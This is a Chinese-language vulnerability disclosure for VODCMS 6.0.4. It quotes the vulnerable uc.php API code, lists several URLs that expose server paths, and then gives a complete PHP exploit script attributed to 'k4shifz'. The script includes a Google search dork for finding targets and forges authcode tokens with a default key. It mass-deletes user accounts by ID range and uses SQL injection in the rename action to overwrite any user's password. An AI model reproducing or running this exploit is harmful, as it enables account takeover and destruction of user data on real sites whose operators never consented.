任意删用户,任意改用户密码bug,及其他暴路径bug

api/uc.php:

$code = $_GET['code'];  //code未过滤
parse_str(authcode($code, 'DECODE', UC_KEY), $get); //覆盖$get数组,注意它用了自己的加密函数
.....
if(time() - $get['time'] > 3600) {  //注意time的值
        exit('Authracation has expiried');
}

if(empty($get)) {
        exit('Invalid Request');
}
$action = $get['action'];
$timestamp = time();
$db = new db();
$db->connect($database['dbhost'], $database['dbuser'], $database['dbpass'], $database['dbname'], $pconnect);
unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect);
if($action == 'test') {

        exit(API_RETURN_SUCCEED);

} elseif($action == 'deleteuser') {

        !API_DELETEUSER && exit(API_RETURN_FORBIDDEN);

        //用户删除 API 接口
        $uids = $get['ids'];
        $query = $db->query("DELETE FROM {$tablepre}members WHERE uid IN ($uids)");  // 构造sql语句

        exit(API_RETURN_SUCCEED);

} elseif($action == 'renameuser') {

        !API_RENAMEUSER && exit(API_RETURN_FORBIDDEN);

        //用户改名 API 接口
        $uid = $get['uid'];
        $usernamenew = $get['newusername'];
        echo "UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'"; // 构造sql语句

        $db->query("UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'");

        exit(API_RETURN_SUCCEED);

} elseif($action == 'updatepw') {

        !API_UPDATEPW && exit(API_RETURN_FORBIDDEN);

index.php?mod=feedback&action=report  暴路径
index.php?mod=content&action=comment  暴路径
index.php?mod=api&action=getfromvodcms  暴路径

Exp:


<?php
/* google inurl:index.php?mod=category */
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

        $ckey_length = 4;

        $key = md5($key ? $key : UC_KEY);
        $keya = md5(substr($key, 0, 16));
        $keyb = md5(substr($key, 16, 16));
        $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

        $cryptkey = $keya.md5($keya.$keyc);
        $key_length = strlen($cryptkey);

        $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
        $string_length = strlen($string);

        $result = '';
        $box = range(0, 255);

        $rndkey = array();
        for($i = 0; $i <= 255; $i++) {
                $rndkey[$i] = ord($cryptkey[$i % $key_length]);
        }

        for($j = $i = 0; $i < 256; $i++) {
                $j = ($j + $box[$i] + $rndkey[$i]) % 256;
                $tmp = $box[$i];
                $box[$i] = $box[$j];
                $box[$j] = $tmp;
        }

        for($a = $j = $i = 0; $i < $string_length; $i++) {
                $a = ($a + 1) % 256;
                $j = ($j + $box[$a]) % 256;
                $tmp = $box[$a];
                $box[$a] = $box[$j];
                $box[$j] = $tmp;
                $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
        }
        if($operation == 'DECODE') {
                if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
                        return substr($result, 26);
                } else {
                        return '';
                }
        } else {
                return $keyc.str_replace('=', '', base64_encode($result));
        }

}
print_r('
[+]----------VODCMS 6.0.4 UC bug by k4shifz----------[+]

');
if ($argc != 6)
        die('usage:
        exe host path start-userid end-userid 1
        exe host path username password 2
');
switch($argv[5])
{
        case 1:
        {
                //delete users
                $host=$argv[1];
                $path=$argv[2];
                $startuid=$argv[3];
                $enduid=$argv[4];
       
                for($i=$startuid;$i<=$enduid;$i++)
                {
                        $c=urlencode(authcode('time='.time().'&action=deleteuser&ids='.$i, 'ENCODE', '123456'));
               
                        if ( file_get_contents("http://$host$path/api/uc.php?code=$c")  == "1")
                                echo "user id $i delete success ! \n";
                        else
                                echo "user id $i delete failed ! \n";
                }
                break;
        }
        case 2:
        {
                $host=$argv[1];
                $path=$argv[2];
                $username=$argv[3];
                $password=md5($argv[4]);
                //change user name or password
                $b=urlencode(authcode('time='.time().'&action=renameuser&uid=\' or username=\''.$username.'&newusername='.$username.'\',password=\''.$password, 'deCODE', '123456'));
                if ( file_get_contents("http://$host$path/api/uc.php?code=$b")  == "1")
                        echo "$username's Password has been changed $argv[4] ! \n";
                else
                        echo "$username's Password changed failed ! \n";
                break;
        }
}

?>